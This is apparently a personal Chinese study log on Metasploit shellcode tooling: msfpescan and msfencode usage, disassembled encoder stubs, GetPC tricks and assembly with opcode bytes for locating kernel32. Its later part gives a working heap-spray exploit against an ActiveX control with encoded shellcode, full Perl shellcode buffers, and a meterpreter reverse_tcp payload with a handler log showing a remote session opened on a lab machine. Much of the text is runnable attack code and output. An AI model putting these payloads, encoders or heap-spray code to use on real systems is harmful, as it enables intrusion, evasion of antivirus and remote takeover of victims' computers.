msfpescan ,msfencode 等命令使用
首先下面额指令都是我用到时记录的,可以说是经常用到吧
先找到memdump.exe文件:
C:Program FilesMetasploitFramework3msf3 oolsmemdumpmemdump.exe
在CMD下 运行 memdump.exe 进程PID c:abc
然后进入console
运行 msfpescan -p -m c:/abc > 1.txt 妈个蛋 要安装ruby 不安装了·······直接用msfpescan -p xx.dll我还觉得方便些
eg: msfpescan player.dll -p 搜索DLL中所有pop pop ret 指令
Usage: /msf3/msfpescan [mode] <options> [targets]
Modes:
-j, --jump [regA,regB,regC] Search for jump equivalent instructions
-p, --poppopret Search for pop+pop+ret combinations
-r, --regex [regex] Search for regex match
-a, --analyze-address [address] Display the code at the specified address
-b, --analyze-offset [offset] Display the code at the specified offset
-f, --fingerprint Attempt to identify the packer/compiler
-i, --info Display detailed information about the image
-R, --ripper [directory] Rip all module resources to disk
--context-map [directory] Generate context-map files
Options:
-M, --memdump The targets are memdump.exe directories
-A, --after [bytes] Number of bytes to show after match (-a/-b)
-B, --before [bytes] Number of bytes to show before match (-a/-b)
-D, --disasm Disassemble the bytes at this address
-I, --image-base [address] Specify an alternate ImageBase
-F, --filter-addresses [regex] Filter addresses based on a regular expression
-h, --help Show this message
下面学习用 msfencode 加密shellcode 的方法:
root@bt:/opt/framework/msf3# ./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: 'x00xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-v Increase verbosity
-x <opt> Specify an alternate executable template
root@bt:/opt/framework/msf3# ./msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
学习几种shellcode编码/加密方式:
每次得到的shellcode 都不相同了, 放在ESI 中的值,得到解码器起始地址的指令位置,记录位置的寄存器 ,循环前面的指令,变量的值都变了
1) x86/shikata_ga_nai
00427400 BA 99B20D32 mov edx,0x320DB299
00427405 DBC9 fcmovne st,st(1)
00427407 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] //这句代码得到解码器第一个FPU指令的地址,这个指令能工作的必备条件是前面至少有个FPU指令被执行
//可以是 fcmovne st,st(1) fldpi fldz ffree st(3) fcmovnb st,st fcmovnbe st,st(5)
0042740B 5D pop ebp
0042740C 29C9 sub ecx,ecx
0042740E B1 46 mov cl,0x46
00427410 3155 13 xor dword ptr ss:[ebp+0x13],edx //xor 解码
00427413 83C5 04 add ebp,0x4
00427416 0355 96 add edx,dword ptr ss:[ebp-0x6A]
00427419 ^E2 F5 loopd Xtest1231.00427410 //用LOOP 去循环取值
2)x86/alpha_mixed 主要思想是 重新产生原始代码(通过一个循环)
00427400 > 89E0 mov eax,esp 00427402 DBD3 fcmovnbe st,st(3) 00427404 D970 F4 fstenv (28-byte) ptr ds:[eax-0xC] 00427407 5D pop ebp 00427408 55 push ebp 00427409 59 pop ecx 0042740A 49 dec ecx 0042740B 49 dec ecx 0042740C 49 dec ecx 0042740D 49 dec ecx 0042740E 49 dec ecx 0042740F 49 dec ecx 00427410 49 dec ecx 00427411 49 dec ecx 00427412 49 dec ecx 00427413 49 dec ecx 00427414 43 inc ebx 00427415 43 inc ebx 00427416 43 inc ebx 00427417 43 inc ebx 00427418 43 inc ebx 00427419 43 inc ebx 0042741A 37 aaa 0042741B 51 push ecx 0042741C 5A pop edx 0042741D 6A 41 push 0x41 0042741F 58 pop eax 00427420 50 push eax 00427421 3041 30 xor byte ptr ds:[ecx+0x30],al 00427424 41 inc ecx 00427425 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x10 00427429 3241 42 xor al,byte ptr ds:[ecx+0x42] 0042742C 3242 42 xor al,byte ptr ds:[edx+0x42] 0042742F 3042 42 xor byte ptr ds:[edx+0x42],al 00427432 41 inc ecx 00427433 42 inc edx 00427434 58 pop eax 00427435 50 push eax 00427436 3841 42 cmp byte ptr ds:[ecx+0x42],al 00427439 ^ 75 E9 jnz Xtest1231.00427424
3)x86/fnstenv_mov 还是解密 产生原始代码
00427400 > 6A 3F push 0x3F 00427402 59 pop ecx 00427403 D9EE fldz 00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ;都是通过这两条获取当前地址 去操作解密的 00427409 5B pop ebx 0042740A 8173 13 413EFDC>xor dword ptr ds:[ebx+0x13],0xC3FD3E41 ; Decrypt ->00427416 00427411 83EB FC sub ebx,-0x4 00427414 ^ E2 F4 loopd Xtest1231.0042740A 00427416 D9EB fldpi
4) x86/call4_dword_xor
00427400 > 31C9 xor ecx,ecx 00427402 83E9 C1 sub ecx,-0x3F 00427405 E8 FFFFFFFF call test1231.00427409 ;这个就不同于上面的 这个是call 得到下一条语句地址 0042740A C05E 81 76 rcr byte ptr ds:[esi-0x7F],0x76 ; 0042740E 0E push cs 0042740F D6 salc 00427410 8A28 mov ch,byte ptr ds:[eax] 00427412 AC lods byte ptr ds:[esi] 00427413 83EE FC sub esi,-0x4 00427416 ^ E2 F4 loopd Xtest1231.0042740C
5)skylined alpha3
http://bbs.pediy.com/showthread.php?t=156913 用的 半斤八两 集合的 MFC 用的就是这个编码器
~~~小知识 修改MFC 左上角 图标
HICON m_hIcon;
m_hIcon = AfxGetApp()->LoadIcon(IDI_ICON1); //为资源ID 。改成其他图标就用对应的资源ID
SetIcon(m_hIcon, TRUE);
注意使用它时必须 eip 指向 eax 指向 shellcode 起始
可以全部转换为 可视代码~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
00427400 50 push eax ;eax首先就指向 shellcode 起始地址第一字节 00427401 59 pop ecx 00427402 49 dec ecx 00427403 49 dec ecx 00427404 49 dec ecx 00427405 49 dec ecx 00427406 49 dec ecx 00427407 49 dec ecx 00427408 49 dec ecx 00427409 49 dec ecx 0042740A 49 dec ecx 0042740B 49 dec ecx 0042740C 49 dec ecx 0042740D 49 dec ecx 0042740E 49 dec ecx 0042740F 49 dec ecx 00427410 49 dec ecx 00427411 49 dec ecx 00427412 37 aaa 00427413 51 push ecx 00427414 5A pop edx 00427415 6A 41 push 0x41 00427417 58 pop eax 00427418 50 push eax 00427419 3041 30 xor byte ptr ds:[ecx+0x30],al 0042741C 41 inc ecx 0042741D 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x10 00427421 3241 42 xor al,byte ptr ds:[ecx+0x42] 00427424 3242 42 xor al,byte ptr ds:[edx+0x42] 00427427 3042 42 xor byte ptr ds:[edx+0x42],al 0042742A 41 inc ecx 0042742B 42 inc edx 0042742C 58 pop eax 0042742D 50 push eax 0042742E 3841 42 cmp byte ptr ds:[ecx+0x42],al 00427431 ^ 75 E9 jnz Xtest1231.0042741C~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GETPC方式~~~~~~~~~~~~~~~~~~~~~~~
1) call $+4 (注意call $+5不好用)
00427400 E8 FFFFFFFF call test1231.00427404 ;jmp 到 00427404 FFC3 inc ebx 不影响,然后 pop ecx 即可把00427405 返回到 ecx 00427405 C3 retn 00427406 59 pop ecx
2) FSTENV
00427403 D9EE fldz ;一个FPU指令 00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ;会在第一条指令执行之后保存浮点芯片的状态。第一条指令的地址保存在 0xc的偏移量处。 然后一个pop 即可保存地址
3)Backward call
00427400 /EB 03 jmp Xtest1231.00427405 ;1)jmp 00427402 |5E pop esi<span style="white-space:pre"> </span> <span style="white-space:pre"> </span> 3);弹出esi为 <span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span> 00427403 |FFD6 call esi 4)保存00427405 到esp 并且继续执行<span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span> 00427405 E8 F8FFFFFF call test1231.00427402 ;2)保存 下一条地址 0042740A到 esp 0042740A 49 dec ecx ; test1231.004274054) seh getpc
寻找kernel32.dll 因为 我们想找 LoadLibrary 和 GetProcAddress
lkd> dt _peb nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void +0x00c Ldr : Ptr32 _PEB_LDR_DATA +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS +0x014 SubSystemData : Ptr32 Void ··········
lkd> dt _PEB_LDR_DATA<span style="white-space:pre"> </span> nt!_PEB_LDR_DATA +0x000 Length : Uint4B +0x004 Initialized : UChar +0x008 SsHandle : Ptr32 Void +0x00c InLoadOrderModuleList : _LIST_ENTRY +0x014 InMemoryOrderModuleList : _LIST_ENTRY +0x01c InInitializationOrderModuleList : _LIST_ENTRY +0x024 EntryInProgress : Ptr32 Void
lkd> dt _ldr_data_table_entry nt!_LDR_DATA_TABLE_ENTRY +0x000 InLoadOrderLinks : _LIST_ENTRY +0x008 InMemoryOrderLinks : _LIST_ENTRY +0x010 InInitializationOrderLinks : _LIST_ENTRY +0x018 DllBase : Ptr32 Void +0x01c EntryPoint : Ptr32 Void +0x020 SizeOfImage : Uint4B +0x024 FullDllName : _UNICODE_STRING +0x02c BaseDllName : _UNICODE_STRING +0x034 Flags : Uint4B `````````````````
lkd> dt _UNICODE_STRING nt!_UNICODE_STRING +0x000 Length : Uint2B +0x002 MaximumLength : Uint2B +0x004 Buffer : Ptr32 Uint2B
1) 通过PEB
(1)通过 ldr + 0xc InLoadOrderModuleList 结构 通用~~~~~~
0040D4AF |. 33D2 xor edx,edx 0040D4B1 |. 64:8B5A 30 mov ebx,dword ptr fs:[edx+0x30] ; PEB 0040D4B5 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; ldr 0040D4B8 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ### InLoadOrderModuleList-》_LIST_ENTRY本身就是LDR_DATA_TABLE_ENTRY结构 0040D4BB |. 8B1B mov ebx,dword ptr ds:[ebx] ### InLoadOrderLinks -> WIN7:这里 [ebx+0x18] 是地址 SysWOW64 tdll.dll XP SP3: system32 tdll.dll 0040D4BD |. 8B1B mov ebx,dword ptr ds:[ebx] ### InLoadOrderLinks -> WIN7:这里 [ebx+0x18] 是地址 SysWOW64kernel32.dll XP SP3: system32kernel32.dll 0040D4BF |. 8B5B 18 mov ebx,dword ptr ds:[ebx+0x18] ; +0x018 DllBase : Ptr32 Void 0040D4C2 |. 8BEB mov ebp,ebx ; kernel32.74CB000033 D2 64 8B 5A 30 8B 5B 0C 8B 5B 0C 8B 1B 8B 1B 8B 5B 18 8B EB
(2) 通过 ldr + 0x14 InMemoryOrderModuleList 通用~~~~~~
0040D4AF 33DB xor ebx,ebx 0040D4B1 64:8B5B 30 mov ebx,dword ptr fs:[ebx+0x30] 0040D4B5 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; ldr 0040D4B8 8B5B 14 mov ebx,dword ptr ds:[ebx+0x14] ; InMemoryOrderModuleList 0040D4BB 8B1B mov ebx,dword ptr ds:[ebx] ### InMemoryOrderLinks -》 WIN7: 这里 [ebx+0x20] 是地址 SysWOW64 tdll.dll XP SP3: system32 tdll.dll 0040D4BD 8B1B mov ebx,dword ptr ds:[ebx] ### InMemoryOrderLinks -》 WIN7: 这里 [ebx+0x20] 是地址 SysWOW64kernel32.dll XP SP3: system32kernel32.dll 0040D4BF 8B5B 10 mov ebx,dword ptr ds:[ebx+0x10] ### [ebx+0x10] 是 DllBase
33 DB 64 8B 5B 30 8B 5B 0C 8B 5B 14 8B 1B 8B 1B 8B 5B 10 8B EB
(3) 下面在 2000也实用,再经构造 对BaseDllName 验证 hash值: 通用~~~~~~
0040D4AF FC cld 0040D4B0 33D2 xor edx,edx 0040D4B2 64:8B52 30 mov edx,dword ptr fs:[edx+0x30] 0040D4B6 8B52 0C mov edx,dword ptr ds:[edx+0xC] 0040D4B9 8B52 14 mov edx,dword ptr ds:[edx+0x14] ; InMemoryOrderModuleList 0040D4BC 8B72 28 mov esi,dword ptr ds:[edx+0x28] ; BaseDllName -》Buffer 0040D4BF 6A 18 push 0x18 ; kernel32.dll length=12*2 0040D4C1 59 pop ecx 0040D4C2 33FF xor edi,edi 0040D4C4 33C0 xor eax,eax 0040D4C6 AC lods byte ptr ds:[esi] 0040D4C7 3C 61 cmp al,0x61 ; cmp al,‘a’ 0040D4C9 7C 02 jl Xtest1231.0040D4CD 0040D4CB 2C 20 sub al,0x20 0040D4CD C1CF 0D ror edi,0xD 0040D4D0 03F8 add edi,eax 0040D4D2 ^ E2 F0 loopd Xtest1231.0040D4C4 0040D4D4 81FF 5BBC4A6A cmp edi,0x6A4ABC5B 0040D4DA 8B5A 10 mov ebx,dword ptr ds:[edx+0x10] ; DllBase 0040D4DD 8B12 mov edx,dword ptr ds:[edx] ; 下一个InMemoryOrderLinks 0040D4DF ^ 75 DB jnz Xtest1231.0040D4BC ; ebx 为kernerl32.dll基址
FC 33 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 6A 18 59 33 FF 33 C0 AC 3C 61 7C 02 2C 20 C1 CF
0D 03 F8 E2 F0 81 FF 5B BC 4A 6A 8B 5A 10 8B 12 75 DB
(4) ldr + 0x1c InInitializationOrderModuleList 通过验证 buffer 长度 通用~~~~~
0040D4AF 33C9 xor ecx,ecx
0040D4B1 64:8B71 30 mov esi,dword ptr fs:[ecx+0x30]
0040D4B5 8B76 0C mov esi,dword ptr ds:[esi+0xC] ; ldr
0040D4B8 8B76 1C mov esi,dword ptr ds:[esi+0x1C] ; InInitializationOrderModuleList
0040D4BB 8B6E 08 mov ebp,dword ptr ds:[esi+0x8] ; esi+0x8 = DllBase
0040D4BE 8B7E 20 mov edi,dword ptr ds:[esi+0x20] ; esi+0x20 = BaseDllName ->buffer
0040D4C1 8B36 mov esi,dword ptr ds:[esi] ; 下一个InInitializationOrderLinks
0040D4C3 384F 18 cmp byte ptr ds:[edi+0x18],cl ; modulename[12] == 0?
; len(KERNELBASE.dll)=14 len(kernel32.dll)=12
0040D4C6 ^ 75 F3 jnz Xtest1231.0040D4BB ; ebp = kernel32基址33 C9 64 8B 71 30 8B 76 0C 8B 76 1C 8B 6E 08 8B 7E 20 8B 36 38 4F 18 75 F3
(5)不通用 而且 有 00 字节b WIN7 和 xp 有区别 ldr + 0x1c InInitializationOrderModuleList 不 通用~~~~~~
0040D4AF 33C0 xor eax,eax
0040D4B1 64:8B40 30 mov eax,dword ptr fs:[eax+0x30]
0040D4B5 8B40 0C mov eax,dword ptr ds:[eax+0xC] ; ldr
0040D4B8 8B70 1C mov esi,dword ptr ds:[eax+0x1C] ; InInitializationOrderModuleList
0040D4BB AD lods dword ptr ds:[esi]
;InInitializationOrderLinks ->
; WIN7:这里FullDllName [ebx+0x18] 是syswow64KERNELBASE.dll
; XP SP3: system32kernel32.dll
0040D4BC 8B00 mov eax,dword ptr ds:[eax]
; InInitializationOrderLinks- >
; WIN7:这里FullDllName [ebx+0x18] 是syswow64kernel32.dll
; XP SP3: 这里 [eax+0x8] 即为 kernerl32.dll基址
0040D4BE 8B40 08 mov eax,dword ptr ds:[eax+0x8] ; [eax+0x8] 是DllBase kernel32.74CB0000
win7 是因为 它是 32位程序,所以按32位来编码的
下面为 SEH 知识,复习下
ntdll!_TEB
struct _TEB, 66 elements, 0xfb8 bytes
+0x000 NtTib : struct _NT_TIB, 8 elements, 0x1c bytes
+0x000 ExceptionList : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD,2 elements, 0x8 bytes
+0x000 Next : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes
+0x004 Handler : Ptr32 to _EXCEPTION_DISPOSITION
+0x004 StackBase : Ptr32 to Void
+0x008 StackLimit : Ptr32 to Void
+0x00c SubSystemTib : Ptr32 to Void
+0x010 FiberData : Ptr32 to Void
+0x010 Version : Uint4B
2) 通过SEH
下面的技术要求 最后一个异常处理函数 0xffffffff 指向 kernel32.dll ,所以查找可让kernel32里面的指针后,
要做的就是往回循环到内核的顶部,比较前两个字节。
如果最后一个异常处理函数没有指向 kewrnel32.dll 这个技术明显会失败
我的 WIN7 失败~~~~~~~~~~~~~~~~~~~
0040D4AF 56 push esi
0040D4B0 51 push ecx
0040D4B1 33C9 xor ecx,ecx ; ecx = 0
0040D4B3 64:8B31 mov esi,dword ptr fs:[ecx] ; esi = NtTib =指向nseh的指针
0040D4B6 AD lods dword ptr ds:[esi] ; eax = 指向下一个nseh(0xffffffff)的指针
0040D4B7 96 xchg eax,esi ; esi =指向下一个nseh(0xffffffff)的指针,
eax = NtTib =指向nseh的指针
0040D4B8 390E cmp dword ptr ds:[esi],ecx ; nseh == 0
0040D4BA ^ 79 FA jns Xtest1231.0040D4B6
0040D4BC AD lods dword ptr ds:[esi] ; eax = ffffffff,esi+4 指向seh
0040D4BD AD lods dword ptr ds:[esi] ; eax = seh地址
0040D4BE 48 dec eax
0040D4BF 66:33C0 xor ax,ax
0040D4C2 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D
0040D4C7 ^ 75 F5 jnz Xtest1231.0040D4BE ; eax=ntdll.dll基址
0040D4C9 59 pop ecx
0040D4CA 5E pop esi
0040D4CB C3 retn
56 51 33 C9 64 8B 31 AD 96 39 0E 79 FA AD AD 48 66 33 C0 66 81 38 4D 5A 75 F5 59 5E C3
3) TOPSTACK TEB
XP SP3 行得通 WIN7不行~~~~~
0044F611 > 56 push esi 0044F612 33F6 xor esi,esi 0044F614 64:8B46 04 mov eax,dword ptr fs:[esi+0x4] 0044F618 8B40 E4 mov eax,dword ptr ds:[eax-0x1C] ; hander 0044F61B 48 dec eax ; kernel32._except_handler3; SE 处理程序安装 0044F61C 66:33C0 xor ax,ax 0044F61F 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D 0044F624 ^ 75 F5 jnz X表白专用.0044F61B 0044F626 5E pop esi 0044F627 C3 retn
56 33 F6 64 8B 46 04 8B 40 E4 48 66 33 C0 66 81 38 4D 5A 75 F5 5E C3
解释一下: 顶层一场处理结构体总是安排在线程堆栈最高端再-20h处
UNICODE 编码学习~~~~~~:
root@bt:/opt/framework/msf3# ./msfencode -i /root/Desktop/1.dat -c 1 -b 'x00' -e x86/shikata_ga_nai -t js_le [*] x86/shikata_ga_nai succeeded with size 195 (iteration=1) %uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6
可以用··················· 可以设置 不要 bad characters
<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=unescape("%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6")
while (nop.length < 0x100000/2)
{nop += nop;}
nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);
nop =nop+ shellcode;
var memory = new Array();
for (var i=0;i<200;i++)
{memory[i] += nop;}
arg1='x0a';
while(arg1.length < 2000){arg1 += 'x0c';}
arg2 = 'x0cx0cx0cx0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script> 用msfencode 生成 unicode shellcode
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R | > ./msfencode -e x86/alpha_mixed -t raw | > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl [*] x86/alpha_mixed succeeded with size 454 (iteration=1) [*] x86/unicode_upper succeeded with size 1039 (iteration=1) my $buf = "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" . "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" . "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" . "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . "x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" . "x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" . "x51x49x31x41x49x51x49x41x49x51x49x31x31x31" . "x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" . "x42x41x42x41x42x41x42x33x30x41x50x42x39x34" . "x34x4ax42x54x49x4bx31x49x4bx58x4ex49x49x52" . "x51x5ax54x51x4ex50x56x52x39x50x49x50x49x51" . "x39x50x49x51x39x51x39x50x49x51x39x50x49x50" . "x49x51x33x51x33x50x43x50x43x50x43x50x43x50" . "x37x52x31x51x4ax51x5ax51x31x50x58x50x50x50" . "x30x51x31x50x30x51x31x52x4bx51x31x51x31x50" . "x51x50x32x51x31x50x42x50x32x51x32x51x32x50" . "x30x51x32x50x42x51x31x51x32x50x58x52x30x50" . "x38x51x31x50x42x54x35x50x4ax51x39x50x49x52" . "x4cx50x4bx51x48x50x4ex43x39x50x43x50x30x50" . "x45x52x30x51x37x54x30x51x33x50x50x50x4dx50" . "x59x50x49x43x45x51x46x52x31x52x38x51x42x51" . "x33x50x54x50x4cx50x4bx50x52x43x42x52x36x50" . "x50x50x4cx50x4bx51x33x51x52x50x54x50x4cx50" . "x4ex52x4bx50x52x52x52x51x46x43x44x50x4cx50" . "x4bx51x44x50x32x50x45x43x48x50x56x52x4fx50" . "x4dx43x37x50x52x52x4ax50x56x50x46x51x46x50" . "x51x51x39x52x4fx50x50x50x31x51x39x52x30x50" . "x4ex50x4cx51x37x50x4cx50x50x51x51x50x51x52" . "x4cx51x37x52x52x50x56x50x4cx50x45x52x50x51" . "x39x52x31x52x38x50x4fx50x56x52x4dx50x45x50" . "x51x50x49x51x47x51x39x43x42x50x4cx50x30x51" . "x42x52x52x50x43x52x47x50x4ex52x4bx50x51x51" . "x32x52x32x50x30x50x4ex52x4bx50x43x43x42x50" . "x45x52x4cx50x56x51x51x51x4ax52x50x50x4cx50" . "x4bx50x51x52x30x52x32x51x48x50x4cx50x45x50" . "x4bx52x50x50x52x52x34x52x30x50x4ax50x45x52" . "x31x52x38x52x30x52x30x50x50x50x4cx50x4bx51" . "x33x54x38x50x47x52x48x50x4cx50x4bx50x43x43" . "x38x50x45x54x30x52x36x51x51x50x49x50x43x50" . "x4dx50x33x51x37x50x4cx52x31x51x49x50x4ex52" . "x4bx52x36x52x34x50x4ex52x4bx50x45x52x31x52" . "x38x51x46x50x45x51x51x50x4bx50x4fx52x34x52" . "x51x50x4fx50x30x50x4ex50x4cx50x4fx50x31x50" . "x58x50x4fx52x36x52x4dx51x33x50x31x50x4fx50" . "x37x50x50x50x38x50x4dx50x30x50x43x51x35x51" . "x48x54x34x51x44x50x43x50x43x50x4dx51x4ax50" . "x58x50x47x50x4bx50x51x52x4dx52x31x50x34x50" . "x54x50x35x50x58x52x42x50x50x52x38x50x4ex52" . "x4bx50x56x50x38x51x35x54x34x51x35x50x51x51" . "x48x50x53x52x30x43x36x50x4cx50x4bx51x46x52" . "x4cx52x32x52x4bx50x4ex52x4bx50x50x52x38x51" . "x35x50x4cx51x37x52x51x50x49x50x43x50x4cx50" . "x4bx50x47x54x34x50x4ex52x4bx51x37x54x31x50" . "x4ex50x30x50x4ex43x39x50x52x52x44x51x37x51" . "x44x50x51x50x34x50x51x50x4bx52x31x50x4bx50" . "x45x50x31x50x50x50x59x51x33x51x5ax52x32x52" . "x51x51x39x52x4fx50x4bx50x50x52x30x51x48x51" . "x33x52x4fx51x42x52x5ax50x4cx50x4bx50x45x50" . "x42x50x5ax50x4bx50x4dx52x36x50x51x50x4dx51" . "x33x50x5ax50x47x52x51x50x4ex52x4dx50x4fx52" . "x55x50x4ex51x49x51x33x50x30x51x37x54x30x51" . "x33x50x30x52x30x50x50x50x51x43x48x50x50x50" . "x31x50x4ex52x4bx50x50x52x4fx50x4fx43x47x50" . "x4bx50x4fx50x58x52x35x50x4dx52x4bx50x4cx50" . "x30x50x4ex51x45x50x4fx52x32x50x51x50x46x50" . "x43x51x48x50x4fx51x46x50x5ax50x35x50x4dx52" . "x4dx50x4dx50x4dx50x4bx50x4fx50x4bx43x35x50" . "x47x50x4cx51x37x54x36x50x43x50x4cx50x54x50" . "x4ax50x4fx52x50x51x39x52x4bx50x4bx52x30x51" . "x33x50x45x50x47x52x55x50x4fx50x4bx50x43x54" . "x37x50x54x52x33x51x44x50x32x50x50x52x4fx51" . "x42x50x4ax50x43x50x30x52x30x51x43x50x49x52" . "x4fx50x58x51x45x51x35x50x33x52x31x54x31x50" . "x50x52x4cx50x45x50x33x51x33x50x30x51x31x51" . "x31x41x41";
meterpreter 使用 情况学习:
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b 'x00' -t perl -e x86/alpha_mixed [*] x86/alpha_mixed succeeded with size 642 (iteration=1) my $buf = "x89xe6xdbxd8xd9x76xf4x58x50x59x49x49x49x49" . "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . "x42x75x4ax49x49x6cx4bx58x4ex69x45x50x43x30" . "x47x70x43x50x4cx49x5ax45x50x31x4ex32x50x64" . "x4ex6bx51x42x50x30x4ex6bx50x52x56x6cx4cx4b" .··········用的IP和端口 是 监听电脑的端口。在被攻击电脑上运行shellcode 然后监听电脑得到meterpreter
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set LHOST 192.168.198.135 LHOST => 192.168.198.135 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.198.135 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse handler on 192.168.198.135:4444 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.198.136 [*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800 meterpreter >